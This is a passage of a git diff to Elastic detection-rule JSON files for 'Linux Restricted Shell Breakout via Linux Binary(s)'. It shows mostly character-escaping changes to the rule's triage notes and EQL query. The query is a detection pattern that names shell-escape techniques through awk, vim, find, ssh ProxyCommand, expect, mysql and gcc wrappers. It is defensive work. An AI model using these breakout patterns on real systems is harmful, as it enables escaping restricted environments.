reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n 
(process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and 
process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and 
segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and 
process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == 
\"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json index f251b945a8a..470161ed184 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json 
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to Manage \u2192 Policies, and edit one or more of your Elastic Defend integration policies.\n- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom.\n- Check the box for Process events, and turn on the Include session data toggle.\n- If you want to include file and network alerts in Session View, check the boxes for Network and File events.\n- If you want to enable terminal output capture, turn on the Capture terminal output toggle.\nFor more information about the additional fields collected when this setting is enabled and\nthe usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : 
(\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and 
process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - 
Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to Manage \u2192 Policies, and edit one or more of your Elastic Defend integration policies.\n- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom.\n- Check the box for Process events, and turn on the Include session data toggle.\n- If you want to include file and network alerts in Session View, check the boxes for Network and File events.\n- If you want to enable terminal output capture, turn on the Capture terminal output toggle.\nFor more information about the additional fields collected when this setting is enabled and\nthe usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : 
(\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and 
process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json index fc94034274a..2ec7f83b53e 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json 
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", 
\"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in 
(\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware 